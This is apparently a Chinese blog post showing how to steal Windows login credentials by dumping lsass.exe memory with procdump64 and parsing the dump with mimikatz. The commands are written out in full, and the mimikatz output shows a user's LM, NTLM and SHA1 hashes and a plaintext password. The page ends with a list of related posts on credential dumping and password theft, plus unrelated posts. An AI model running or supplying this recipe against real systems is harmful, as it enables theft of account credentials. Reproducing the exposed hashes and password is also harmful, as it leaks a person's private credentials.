procdump64+mimikatz获取win用户hash密码
1.导出lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
2.执行mimikatz
mimikatz.exe
"sekurlsa::minidump lsass.dmp"
"sekurlsa::logonPasswords full"
exit
效果:
.#####. mimikatz 2.1. (x64) built on Jun :: - lil!
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp' mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump... Authentication Id : ; (:00021a83)
Session : Interactive from
User Name : chenglee
Domain : chenglee-PC
Logon Server : CHENGLEE-PC
Logon Time : // ::
SID : S-------
msv :
[] Primary
* Username : chenglee
* Domain : chenglee-PC
* LM : 9cffd5e7eefa14babacbf0b4adf55fde
* NTLM : 8d0f8e1a18236379538411a9056799f5
* SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20
tspkg :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
wdigest :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
kerberos :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
ssp :
credman : Authentication Id : ; (:00021a5d)
Session : Interactive from
User Name : chenglee
Domain : chenglee-PC
Logon Server : CHENGLEE-PC
Logon Time : // ::
SID : S-------
msv :
[] Primary
* Username : chenglee
* Domain : chenglee-PC
* LM : 9cffd5e7eefa14babacbf0b4adf55fde
* NTLM : 8d0f8e1a18236379538411a9056799f5
* SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20
tspkg :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
wdigest :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
kerberos :
* Username : chenglee
* Domain : chenglee-PC
* Password : lizhenghua
ssp :
credman : Authentication Id : ; (:000003e5)
Session : Service from
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : // ::
SID : S---
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman : Authentication Id : ; (:000003e4)
Session : Service from
User Name : CHENGLEE-PC$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : // ::
SID : S---
msv :
tspkg :
wdigest :
* Username : CHENGLEE-PC$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : chenglee-pc$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman : Authentication Id : ; (:0000bdf6)
Session : UndefinedLogonType from
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : // ::
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman : Authentication Id : ; (:000003e7)
Session : UndefinedLogonType from
User Name : CHENGLEE-PC$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : // ::
SID : S---
msv :
tspkg :
wdigest :
* Username : CHENGLEE-PC$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : chenglee-pc$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman : mimikatz(commandline) # exit
Bye!
procdump64+mimikatz获取win用户hash密码的更多相关文章
- 两步完成利用procdump64+mimikatz获取win用户密码
使用procdump64+mimikatz可实现从内存中获取明文密码 工具 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 首先得 ...
- 渗透测试环境搭建以及使用sqlmap获取mysql用户数据库密码
通过sqlmap检测sql注入漏洞 安装SQLmap漏洞查看工具 安装渗透测试演练系统DVWA 使用SQLmap进行sql注入并获得后台管理员adnim帐号和密码 环境介绍 安装SQLmap:Rich ...
- Android开发——后台获取用户点击位置坐标(可获取用户支付宝密码)
1. getevent命令 我们首先是根据adb shell getevent命令获取到被点击位置的信息. 这里要说明的是,不同的手机手机获得的点击输出是不一样的.以我的真机为例,输出如下 本文原创, ...
- 6.Dump域内用户Hash姿势集合
本文转自先知社区,原文链接:https://xz.aliyun.com/t/2527#toc-10 原文地址:https://pentestlab.blog/2018/07/04/dumping-do ...
- 内网渗透----使用mimikatz获取windows登陆口令
使用mimikatz提取windows密码 以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privi ...
- 内网技巧-通过SAM数据库获得本地用户hash的方法
内网技巧-通过SAM数据库获得本地用户hash的方法 在windows上的C:\Windows\System32\config目录保存着当前用户的密码hash.我们可以使用相关手段获取该hash. 提 ...
- MySQL新建用户,授权,删除用户,修改密码等命令
首先要声明一下:一般情况下,修改MySQL密码,授权,是需要有mysql里的root权限的. 注:本操作是在WIN命令提示符下,phpMyAdmin同样适用. 用户:phplamp 用户数 ...
- 根据当前登录域账号 获取AD用户姓名和所在OU目录
#region 根据当前登录域账号 获取AD用户姓名和所在OU目录 /// <summary> /// 根据当前登录域账号 获取AD用户姓名和所在OU目录 返回域用户是否存在 /// &l ...
- 为Druid监控配置访问权限(配置访问监控信息的用户与密码)
转: l 为Druid监控配置访问权限(配置访问监控信息的用户与密码) 2014-09-26 09:21:48 来源:renfufei的专栏 收藏 我要投稿 Druid是一 ...
随机推荐
- cssrelative
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" ...
- Winforn中怎样在窗体中打开另一个窗体
场景 在Winform的窗体A中打开另一个窗体B. 实现 //打开新的窗体 CurveCompare cc = new CurveCompare(); cc.Show(); 效果 以上代码的实现参照: ...
- Django--路由层、视图层、模版层
路由层: 路由匹配 url(正则表达式,视图函数内存地址) 只要正则匹配到了内容,就不再往下匹配,而是直接运行后面的视图函数 匹配首页) url(r'^&', home) 匹配尾页 url(r ...
- Java 内存溢出分析
原文地址:Java 内存溢出分析 博客地址:http://www.moonxy.com 一.前言 Java 的 JVM 的内存一般可分为 3 个区:堆(heap).栈(stack)和方法区(metho ...
- Win10家庭版安装Docker
1.下载Docker Toolbox 下载地址:http://mirrors.aliyun.com/docker-toolbox/windows/docker-toolbox/ 2.安装Docker ...
- Day 10 用户的提权,用户组的创建删除
1.如何为用户设定密码,又如何修改密码? 2.用户的创建流程? [扩展了解] 3.用户组如何管理? 4.普通用户无权限怎么办? 切换身份 or 提权? su 切换用户 sudo 提权 5.为用户添 ...
- [Linux] linux下vim对于意外退出的文档的再次开启
转载自博客:https://blog.csdn.net/ljp1919/article/details/48372615 1.对于同一个文件如果上次已经打开,而未关闭的情况下,又打开该文件进行编辑时, ...
- Django模板语言 标签整理
Django模板语言 标签 内置标签引用 1. autoescape 控制自动转义是否可用. 这种标签带有任何 on 或 off 作为参数的话,他将决定转义块内效果. 该标签会以一个endautoes ...
- 使用Fedora8 iso开发环境开发gtk3跨Linux多版本桌面应用
原文: https://bbs.otherhill.com/index.php/topic/show/82 gtk3 demo在/usr/local/gtk3demo 目录下 cd /usr/loca ...
- Python人工智能第一篇:语音合成和语音识别
Python人工智能第一篇:语音合成和语音识别 此篇是人工智能应用的重点,只用现成的技术不做底层算法,也是让初级程序员快速进入人工智能行业的捷径.目前市面上主流的AI技术提供公司有很多,比如百度, ...